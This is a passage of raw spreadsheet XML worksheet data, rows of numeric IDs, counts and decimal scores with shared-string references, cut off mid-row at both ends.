        <v>3.8387432E7</v>
      </c>
      <c r="C25466" s="2" t="s">
        <v>24494</v>
      </c>
      <c r="D25466" s="2">
        <v>1.0</v>
      </c>
      <c r="E25466" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25466" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="25467" ht="15.75" customHeight="1">
      <c r="A25467" s="1">
        <v>24100.0</v>
      </c>
      <c r="B25467" s="2">
        <v>9847979.0</v>
      </c>
      <c r="C25467" s="2" t="s">
        <v>24495</v>
      </c>
      <c r="D25467" s="2">
        <v>1.0</v>
      </c>
      <c r="E25467" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25467" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="25468" ht="15.75" customHeight="1">
      <c r="A25468" s="1">
        <v>27963.0</v>
      </c>
      <c r="B25468" s="2">
        <v>2.3928196E7</v>
      </c>
      <c r="C25468" s="2" t="s">
        <v>24496</v>
      </c>
      <c r="D25468" s="2">
        <v>1.0</v>
      </c>
      <c r="E25468" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25468" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="25469" ht="15.75" customHeight="1">
      <c r="A25469" s="1">
        <v>29213.0</v>
      </c>
      <c r="B25469" s="2">
        <v>3.0788297E7</v>
      </c>
      <c r="C25469" s="2" t="s">
        <v>24497</v>
      </c>
      <c r="D25469" s="2">
        <v>1.0</v>
      </c>
      <c r="E25469" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25469" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="25470" ht="15.75" customHeight="1">
      <c r="A25470" s="1">
        <v>31218.0</v>
      </c>
      <c r="B25470" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C25470" s="2" t="s">
        <v>24498</v>
      </c>
      <c r="D25470" s="2">
        <v>1.0</v>
      </c>
      <c r="E25470" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25470" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="25471" ht="15.75" customHeight="1">
      <c r="A25471" s="1">
        <v>31518.0</v>
      </c>
      <c r="B25471" s="2">
        <v>5079143.0</v>
      </c>
      <c r="C25471" s="2" t="s">
        <v>24499</v>
      </c>
      <c r="D25471" s="2">
        <v>1.0</v>
      </c>
      <c r="E25471" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25471" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="25472" ht="15.75" customHeight="1">
      <c r="A25472" s="1">
        <v>22949.0</v>
      </c>
      <c r="B25472" s="2">
        <v>4889825.0</v>
      </c>
      <c r="C25472" s="2" t="s">
        <v>24500</v>
      </c>
      <c r="D25472" s="2">
        <v>1.0</v>
      </c>
      <c r="E25472" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25472" s="2">
        <v>0.1484674329501917</v>
      </c>
    </row>
    <row r="25473" ht="15.75" customHeight="1">
      <c r="A25473" s="1">
        <v>33909.0</v>
      </c>
      <c r="B25473" s="2">
        <v>9222816.0</v>
      </c>
      <c r="C25473" s="2" t="s">
        <v>24501</v>
      </c>
      <c r="D25473" s="2">
        <v>1.0</v>
      </c>
      <c r="E25473" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25473" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="25474" ht="15.75" customHeight="1">
      <c r="A25474" s="1">
        <v>23752.0</v>
      </c>
      <c r="B25474" s="2">
        <v>7455919.0</v>
      </c>
      <c r="C25474" s="2" t="s">
        <v>24502</v>
      </c>
      <c r="D25474" s="2">
        <v>1.0</v>
      </c>
      <c r="E25474" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25474" s="2">
        <v>0.1484375000000001</v>
      </c>
    </row>
    <row r="25475" ht="15.75" customHeight="1">
      <c r="A25475" s="1">
        <v>33287.0</v>
      </c>
      <c r="B25475" s="2">
        <v>7455918.0</v>
      </c>
      <c r="C25475" s="2" t="s">
        <v>24502</v>
      </c>
      <c r="D25475" s="2">
        <v>1.0</v>
      </c>
      <c r="E25475" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25475" s="2">
        <v>0.1484375000000001</v>
      </c>
    </row>
    <row r="25476" ht="15.75" customHeight="1">
      <c r="A25476" s="1">
        <v>26450.0</v>
      </c>
      <c r="B25476" s="2">
        <v>1.7297184E7</v>
      </c>
      <c r="C25476" s="2" t="s">
        <v>24503</v>
      </c>
      <c r="D25476" s="2">
        <v>1.0</v>
      </c>
      <c r="E25476" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25476" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="25477" ht="15.75" customHeight="1">
      <c r="A25477" s="1">
        <v>30474.0</v>
      </c>
      <c r="B25477" s="2">
        <v>3.9645248E7</v>
      </c>
      <c r="C25477" s="2" t="s">
        <v>24504</v>
      </c>
      <c r="D25477" s="2">
        <v>1.0</v>
      </c>
      <c r="E25477" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25477" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="25478" ht="15.75" customHeight="1">
      <c r="A25478" s="1">
        <v>20494.0</v>
      </c>
      <c r="B25478" s="2">
        <v>1.2874086E7</v>
      </c>
      <c r="C25478" s="2" t="s">
        <v>24505</v>
      </c>
      <c r="D25478" s="2">
        <v>1.0</v>
      </c>
      <c r="E25478" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25478" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="25479" ht="15.75" customHeight="1">
      <c r="A25479" s="1">
        <v>32132.0</v>
      </c>
      <c r="B25479" s="2">
        <v>5.4124275E7</v>
      </c>
      <c r="C25479" s="2" t="s">
        <v>24506</v>
      </c>
      <c r="D25479" s="2">
        <v>1.0</v>
      </c>
      <c r="E25479" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25479" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="25480" ht="15.75" customHeight="1">
      <c r="A25480" s="1">
        <v>22559.0</v>
      </c>
      <c r="B25480" s="2">
        <v>3.8361829E7</v>
      </c>
      <c r="C25480" s="2" t="s">
        <v>24507</v>
      </c>
      <c r="D25480" s="2">
        <v>1.0</v>
      </c>
      <c r="E25480" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25480" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="25481" ht="15.75" customHeight="1">
      <c r="A25481" s="1">
        <v>33869.0</v>
      </c>
      <c r="B25481" s="2">
        <v>9081886.0</v>
      </c>
      <c r="C25481" s="2" t="s">
        <v>24508</v>
      </c>
      <c r="D25481" s="2">
        <v>1.0</v>
      </c>
      <c r="E25481" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25481" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="25482" ht="15.75" customHeight="1">
      <c r="A25482" s="1">
        <v>25633.0</v>
      </c>
      <c r="B25482" s="2">
        <v>1.4467599E7</v>
      </c>
      <c r="C25482" s="2" t="s">
        <v>24509</v>
      </c>
      <c r="D25482" s="2">
        <v>1.0</v>
      </c>
      <c r="E25482" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25482" s="2">
        <v>0.1472663139329807</v>
      </c>
    </row>
    <row r="25483" ht="15.75" customHeight="1">
      <c r="A25483" s="1">
        <v>7442.0</v>
      </c>
      <c r="B25483" s="2">
        <v>5.12178E7</v>
      </c>
      <c r="C25483" s="2" t="s">
        <v>24510</v>
      </c>
      <c r="D25483" s="2">
        <v>1.0</v>
      </c>
      <c r="E25483" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25483" s="2">
        <v>0.1471734892787525</v>
      </c>
    </row>
    <row r="25484" ht="15.75" customHeight="1">
      <c r="A25484" s="1">
        <v>32297.0</v>
      </c>
      <c r="B25484" s="2">
        <v>5552749.0</v>
      </c>
      <c r="C25484" s="2" t="s">
        <v>24511</v>
      </c>
      <c r="D25484" s="2">
        <v>1.0</v>
      </c>
      <c r="E25484" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25484" s="2">
        <v>0.1471734892787525</v>
      </c>
    </row>
    <row r="25485" ht="15.75" customHeight="1">
      <c r="A25485" s="1">
        <v>24742.0</v>
      </c>
      <c r="B25485" s="2">
        <v>1.1798038E7</v>
      </c>
      <c r="C25485" s="2" t="s">
        <v>24512</v>
      </c>
      <c r="D25485" s="2">
        <v>1.0</v>
      </c>
      <c r="E25485" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25485" s="2">
        <v>0.1468253968253968</v>
      </c>
    </row>
    <row r="25486" ht="15.75" customHeight="1">
      <c r="A25486" s="1">
        <v>13997.0</v>
      </c>
      <c r="B25486" s="2">
        <v>3.7383221E7</v>
      </c>
      <c r="C25486" s="2" t="s">
        <v>24513</v>
      </c>
      <c r="D25486" s="2">
        <v>1.0</v>
      </c>
      <c r="E25486" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25486" s="2">
        <v>0.1467013888888889</v>
      </c>
    </row>
    <row r="25487" ht="15.75" customHeight="1">
      <c r="A25487" s="1">
        <v>20418.0</v>
      </c>
      <c r="B25487" s="2">
        <v>1.2288492E7</v>
      </c>
      <c r="C25487" s="2" t="s">
        <v>24514</v>
      </c>
      <c r="D25487" s="2">
        <v>1.0</v>
      </c>
      <c r="E25487" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25487" s="2">
        <v>0.146551724137931</v>
      </c>
    </row>
    <row r="25488" ht="15.75" customHeight="1">
      <c r="A25488" s="1">
        <v>22799.0</v>
      </c>
      <c r="B25488" s="2">
        <v>4.5680406E7</v>
      </c>
      <c r="C25488" s="2" t="s">
        <v>24515</v>
      </c>
      <c r="D25488" s="2">
        <v>1.0</v>
      </c>
      <c r="E25488" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25488" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="25489" ht="15.75" customHeight="1">
      <c r="A25489" s="1">
        <v>23898.0</v>
      </c>
      <c r="B25489" s="2">
        <v>8465361.0</v>
      </c>
      <c r="C25489" s="2" t="s">
        <v>24516</v>
      </c>
      <c r="D25489" s="2">
        <v>1.0</v>
      </c>
      <c r="E25489" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25489" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="25490" ht="15.75" customHeight="1">
      <c r="A25490" s="1">
        <v>31225.0</v>
      </c>
      <c r="B25490" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C25490" s="2" t="s">
        <v>24517</v>
      </c>
      <c r="D25490" s="2">
        <v>1.0</v>
      </c>
      <c r="E25490" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25490" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="25491" ht="15.75" customHeight="1">
      <c r="A25491" s="1">
        <v>29939.0</v>
      </c>
      <c r="B25491" s="2">
        <v>3607484.0</v>
      </c>
      <c r="C25491" s="2" t="s">
        <v>24518</v>
      </c>
      <c r="D25491" s="2">
        <v>1.0</v>
      </c>
      <c r="E25491" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25491" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="25492" ht="15.75" customHeight="1">
      <c r="A25492" s="1">
        <v>26974.0</v>
      </c>
      <c r="B25492" s="2">
        <v>1.9666189E7</v>
      </c>
      <c r="C25492" s="2" t="s">
        <v>24519</v>
      </c>
      <c r="D25492" s="2">
        <v>1.0</v>
      </c>
      <c r="E25492" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25492" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="25493" ht="15.75" customHeight="1">
      <c r="A25493" s="1">
        <v>13579.0</v>
      </c>
      <c r="B25493" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C25493" s="2" t="s">
        <v>24520</v>
      </c>
      <c r="D25493" s="2">
        <v>1.0</v>
      </c>
      <c r="E25493" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25493" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25494" ht="15.75" customHeight="1">
      <c r="A25494" s="1">
        <v>17066.0</v>
      </c>
      <c r="B25494" s="2">
        <v>4.85797E7</v>
      </c>
      <c r="C25494" s="2" t="s">
        <v>24521</v>
      </c>
      <c r="D25494" s="2">
        <v>1.0</v>
      </c>
      <c r="E25494" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25494" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25495" ht="15.75" customHeight="1">
      <c r="A25495" s="1">
        <v>20386.0</v>
      </c>
      <c r="B25495" s="2">
        <v>1.2012502E7</v>
      </c>
      <c r="C25495" s="2" t="s">
        <v>24522</v>
      </c>
      <c r="D25495" s="2">
        <v>1.0</v>
      </c>
      <c r="E25495" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25495" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25496" ht="15.75" customHeight="1">
      <c r="A25496" s="1">
        <v>21672.0</v>
      </c>
      <c r="B25496" s="2">
        <v>2.5016995E7</v>
      </c>
      <c r="C25496" s="2" t="s">
        <v>24523</v>
      </c>
      <c r="D25496" s="2">
        <v>1.0</v>
      </c>
      <c r="E25496" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25496" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25497" ht="15.75" customHeight="1">
      <c r="A25497" s="1">
        <v>22249.0</v>
      </c>
      <c r="B25497" s="2">
        <v>3.2777873E7</v>
      </c>
      <c r="C25497" s="2" t="s">
        <v>24481</v>
      </c>
      <c r="D25497" s="2">
        <v>1.0</v>
      </c>
      <c r="E25497" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25497" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25498" ht="15.75" customHeight="1">
      <c r="A25498" s="1">
        <v>22462.0</v>
      </c>
      <c r="B25498" s="2">
        <v>3.6519821E7</v>
      </c>
      <c r="C25498" s="2" t="s">
        <v>24524</v>
      </c>
      <c r="D25498" s="2">
        <v>1.0</v>
      </c>
      <c r="E25498" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25498" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25499" ht="15.75" customHeight="1">
      <c r="A25499" s="1">
        <v>22786.0</v>
      </c>
      <c r="B25499" s="2">
        <v>4.5372739E7</v>
      </c>
      <c r="C25499" s="2" t="s">
        <v>24525</v>
      </c>
      <c r="D25499" s="2">
        <v>1.0</v>
      </c>
      <c r="E25499" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25499" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25500" ht="15.75" customHeight="1">
      <c r="A25500" s="1">
        <v>22853.0</v>
      </c>
      <c r="B25500" s="2">
        <v>4.7042612E7</v>
      </c>
      <c r="C25500" s="2" t="s">
        <v>24526</v>
      </c>
      <c r="D25500" s="2">
        <v>1.0</v>
      </c>
      <c r="E25500" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25500" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25501" ht="15.75" customHeight="1">
      <c r="A25501" s="1">
        <v>25204.0</v>
      </c>
      <c r="B25501" s="2">
        <v>1.3225422E7</v>
      </c>
      <c r="C25501" s="2" t="s">
        <v>24527</v>
      </c>
      <c r="D25501" s="2">
        <v>1.0</v>
      </c>
      <c r="E25501" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25501" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25502" ht="15.75" customHeight="1">
      <c r="A25502" s="1">
        <v>25529.0</v>
      </c>
      <c r="B25502" s="2">
        <v>1.4221037E7</v>
      </c>
      <c r="C25502" s="2" t="s">
        <v>24528</v>
      </c>
      <c r="D25502" s="2">
        <v>1.0</v>
      </c>
      <c r="E25502" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25502" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25503" ht="15.75" customHeight="1">
      <c r="A25503" s="1">
        <v>27964.0</v>
      </c>
      <c r="B25503" s="2">
        <v>2.3928196E7</v>
      </c>
      <c r="C25503" s="2" t="s">
        <v>24529</v>
      </c>
      <c r="D25503" s="2">
        <v>1.0</v>
      </c>
      <c r="E25503" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25503" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25504" ht="15.75" customHeight="1">
      <c r="A25504" s="1">
        <v>27967.0</v>
      </c>
      <c r="B25504" s="2">
        <v>2.3928196E7</v>
      </c>
      <c r="C25504" s="2" t="s">
        <v>24529</v>
      </c>
      <c r="D25504" s="2">
        <v>1.0</v>
      </c>
      <c r="E25504" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25504" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25505" ht="15.75" customHeight="1">
      <c r="A25505" s="1">
        <v>28202.0</v>
      </c>
      <c r="B25505" s="2">
        <v>2.5016994E7</v>
      </c>
      <c r="C25505" s="2" t="s">
        <v>24523</v>
      </c>
      <c r="D25505" s="2">
        <v>1.0</v>
      </c>
      <c r="E25505" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25505" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25506" ht="15.75" customHeight="1">
      <c r="A25506" s="1">
        <v>30441.0</v>
      </c>
      <c r="B25506" s="2">
        <v>3.9107225E7</v>
      </c>
      <c r="C25506" s="2" t="s">
        <v>24530</v>
      </c>
      <c r="D25506" s="2">
        <v>1.0</v>
      </c>
      <c r="E25506" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25506" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25507" ht="15.75" customHeight="1">
      <c r="A25507" s="1">
        <v>31457.0</v>
      </c>
      <c r="B25507" s="2">
        <v>5.0364443E7</v>
      </c>
      <c r="C25507" s="2" t="s">
        <v>24531</v>
      </c>
      <c r="D25507" s="2">
        <v>1.0</v>
      </c>
      <c r="E25507" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25507" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="25508" ht="15.75" customHeight="1">
      <c r="A25508" s="1">
        <v>14940.0</v>
      </c>
      <c r="B25508" s="2">
        <v>4.1253568E7</v>
      </c>
      <c r="C25508" s="2" t="s">
        <v>24532</v>
      </c>
      <c r="D25508" s="2">
        <v>1.0</v>
      </c>
      <c r="E25508" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25508" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="25509" ht="15.75" customHeight="1">
      <c r="A25509" s="1">
        <v>21139.0</v>
      </c>
      <c r="B25509" s="2">
        <v>1.8551005E7</v>
      </c>
      <c r="C25509" s="2" t="s">
        <v>24533</v>
      </c>
      <c r="D25509" s="2">
        <v>1.0</v>
      </c>
      <c r="E25509" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25509" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="25510" ht="15.75" customHeight="1">
      <c r="A25510" s="1">
        <v>32531.0</v>
      </c>
      <c r="B25510" s="2">
        <v>5734173.0</v>
      </c>
      <c r="C25510" s="2" t="s">
        <v>24534</v>
      </c>
      <c r="D25510" s="2">
        <v>1.0</v>
      </c>
      <c r="E25510" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25510" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="25511" ht="15.75" customHeight="1">
      <c r="A25511" s="1">
        <v>32038.0</v>
      </c>
      <c r="B25511" s="2">
        <v>5369911.0</v>
      </c>
      <c r="C25511" s="2" t="s">
        <v>24535</v>
      </c>
      <c r="D25511" s="2">
        <v>1.0</v>
      </c>
      <c r="E25511" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25511" s="2">
        <v>0.14546783625731</v>
      </c>
    </row>
    <row r="25512" ht="15.75" customHeight="1">
      <c r="A25512" s="1">
        <v>32295.0</v>
      </c>
      <c r="B25512" s="2">
        <v>5552749.0</v>
      </c>
      <c r="C25512" s="2" t="s">
        <v>24536</v>
      </c>
      <c r="D25512" s="2">
        <v>1.0</v>
      </c>
      <c r="E25512" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25512" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
    <row r="25513" ht="15.75" customHeight="1">
      <c r="A25513" s="1">
        <v>13917.0</v>
      </c>
      <c r="B25513" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C25513" s="2" t="s">
        <v>24537</v>
      </c>
      <c r="D25513" s="2">
        <v>1.0</v>
      </c>
      <c r="E25513" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25513" s="2">
        <v>0.1453576864535769</v>
      </c>
    </row>
    <row r="25514" ht="15.75" customHeight="1">
      <c r="A25514" s="1">
        <v>20465.0</v>
      </c>
      <c r="B25514" s="2">
        <v>1.2721522E7</v>
      </c>
      <c r="C25514" s="2" t="s">
        <v>24538</v>
      </c>
      <c r="D25514" s="2">
        <v>1.0</v>
      </c>
      <c r="E25514" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25514" s="2">
        <v>0.1452380952380953</v>
      </c>
    </row>
    <row r="25515" ht="15.75" customHeight="1">
      <c r="A25515" s="1">
        <v>2788.0</v>
      </c>
      <c r="B25515" s="2">
        <v>3.522975E7</v>
      </c>
      <c r="C25515" s="2" t="s">
        <v>24539</v>
      </c>
      <c r="D25515" s="2">
        <v>1.0</v>
      </c>
      <c r="E25515" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25515" s="2">
        <v>0.1449652777777778</v>
      </c>
    </row>
    <row r="25516" ht="15.75" customHeight="1">
      <c r="A25516" s="1">
        <v>8132.0</v>
      </c>
      <c r="B25516" s="2">
        <v>5.3109847E7</v>
      </c>
      <c r="C25516" s="2" t="s">
        <v>24540</v>
      </c>
      <c r="D25516" s="2">
        <v>1.0</v>
      </c>
      <c r="E25516" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25516" s="2">
        <v>0.1446360153256706</v>
      </c>
    </row>
    <row r="25517" ht="15.75" customHeight="1">
      <c r="A25517" s="1">
        <v>21641.0</v>
      </c>
      <c r="B25517" s="2">
        <v>2.4724616E7</v>
      </c>
      <c r="C25517" s="2" t="s">
        <v>24541</v>
      </c>
      <c r="D25517" s="2">
        <v>1.0</v>
      </c>
      <c r="E25517" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25517" s="2">
        <v>0.1446360153256706</v>
      </c>
    </row>
    <row r="25518" ht="15.75" customHeight="1">
      <c r="A25518" s="1">
        <v>29896.0</v>
      </c>
      <c r="B25518" s="2">
        <v>3607014.0</v>
      </c>
      <c r="C25518" s="2" t="s">
        <v>24542</v>
      </c>
      <c r="D25518" s="2">
        <v>1.0</v>
      </c>
      <c r="E25518" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25518" s="2">
        <v>0.1446078431372549</v>
      </c>
    </row>
    <row r="25519" ht="15.75" customHeight="1">
      <c r="A25519" s="1">
        <v>11298.0</v>
      </c>
      <c r="B25519" s="2">
        <v>2.0964177E7</v>
      </c>
      <c r="C25519" s="2" t="s">
        <v>24543</v>
      </c>
      <c r="D25519" s="2">
        <v>1.0</v>
      </c>
      <c r="E25519" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25519" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="25520" ht="15.75" customHeight="1">
      <c r="A25520" s="1">
        <v>22946.0</v>
      </c>
      <c r="B25520" s="2">
        <v>4889468.0</v>
      </c>
      <c r="C25520" s="2" t="s">
        <v>24544</v>
      </c>
      <c r="D25520" s="2">
        <v>1.0</v>
      </c>
      <c r="E25520" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25520" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="25521" ht="15.75" customHeight="1">
      <c r="A25521" s="1">
        <v>28265.0</v>
      </c>
      <c r="B25521" s="2">
        <v>2.536899E7</v>
      </c>
      <c r="C25521" s="2" t="s">
        <v>24545</v>
      </c>
      <c r="D25521" s="2">
        <v>1.0</v>
      </c>
      <c r="E25521" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25521" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="25522" ht="15.75" customHeight="1">
      <c r="A25522" s="1">
        <v>6415.0</v>
      </c>
      <c r="B25522" s="2">
        <v>4.8541108E7</v>
      </c>
      <c r="C25522" s="2" t="s">
        <v>24546</v>
      </c>
      <c r="D25522" s="2">
        <v>1.0</v>
      </c>
      <c r="E25522" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25522" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="25523" ht="15.75" customHeight="1">
      <c r="A25523" s="1">
        <v>16153.0</v>
      </c>
      <c r="B25523" s="2">
        <v>4.5577183E7</v>
      </c>
      <c r="C25523" s="2" t="s">
        <v>24547</v>
      </c>
      <c r="D25523" s="2">
        <v>1.0</v>
      </c>
      <c r="E25523" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25523" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="25524" ht="15.75" customHeight="1">
      <c r="A25524" s="1">
        <v>22915.0</v>
      </c>
      <c r="B25524" s="2">
        <v>4.8316247E7</v>
      </c>
      <c r="C25524" s="2" t="s">
        <v>24548</v>
      </c>
      <c r="D25524" s="2">
        <v>1.0</v>
      </c>
      <c r="E25524" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25524" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="25525" ht="15.75" customHeight="1">
      <c r="A25525" s="1">
        <v>17090.0</v>
      </c>
      <c r="B25525" s="2">
        <v>4.8651416E7</v>
      </c>
      <c r="C25525" s="2" t="s">
        <v>24549</v>
      </c>
      <c r="D25525" s="2">
        <v>1.0</v>
      </c>
      <c r="E25525" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25525" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="25526" ht="15.75" customHeight="1">
      <c r="A25526" s="1">
        <v>22194.0</v>
      </c>
      <c r="B25526" s="2">
        <v>3.1847945E7</v>
      </c>
      <c r="C25526" s="2" t="s">
        <v>24550</v>
      </c>
      <c r="D25526" s="2">
        <v>1.0</v>
      </c>
      <c r="E25526" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25526" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="25527" ht="15.75" customHeight="1">
      <c r="A25527" s="1">
        <v>32635.0</v>
      </c>
      <c r="B25527" s="2">
        <v>5857361.0</v>
      </c>
      <c r="C25527" s="2" t="s">
        <v>24551</v>
      </c>
      <c r="D25527" s="2">
        <v>1.0</v>
      </c>
      <c r="E25527" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25527" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="25528" ht="15.75" customHeight="1">
      <c r="A25528" s="1">
        <v>13578.0</v>
      </c>
      <c r="B25528" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C25528" s="2" t="s">
        <v>24552</v>
      </c>
      <c r="D25528" s="2">
        <v>1.0</v>
      </c>
      <c r="E25528" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25528" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="25529" ht="15.75" customHeight="1">
      <c r="A25529" s="1">
        <v>23447.0</v>
      </c>
      <c r="B25529" s="2">
        <v>5.6775132E7</v>
      </c>
      <c r="C25529" s="2" t="s">
        <v>24553</v>
      </c>
      <c r="D25529" s="2">
        <v>1.0</v>
      </c>
      <c r="E25529" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25529" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="25530" ht="15.75" customHeight="1">
      <c r="A25530" s="1">
        <v>23903.0</v>
      </c>
      <c r="B25530" s="2">
        <v>8481214.0</v>
      </c>
      <c r="C25530" s="2" t="s">
        <v>24554</v>
      </c>
      <c r="D25530" s="2">
        <v>1.0</v>
      </c>
      <c r="E25530" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25530" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="25531" ht="15.75" customHeight="1">
      <c r="A25531" s="1">
        <v>30361.0</v>
      </c>
      <c r="B25531" s="2">
        <v>3.8299855E7</v>
      </c>
      <c r="C25531" s="2" t="s">
        <v>24555</v>
      </c>
      <c r="D25531" s="2">
        <v>1.0</v>
      </c>
      <c r="E25531" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25531" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="25532" ht="15.75" customHeight="1">
      <c r="A25532" s="1">
        <v>2896.0</v>
      </c>
      <c r="B25532" s="2">
        <v>3.5727611E7</v>
      </c>
      <c r="C25532" s="2" t="s">
        <v>24556</v>
      </c>
      <c r="D25532" s="2">
        <v>1.0</v>
      </c>
      <c r="E25532" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25532" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="25533" ht="15.75" customHeight="1">
      <c r="A25533" s="1">
        <v>21590.0</v>
      </c>
      <c r="B25533" s="2">
        <v>2.3928197E7</v>
      </c>
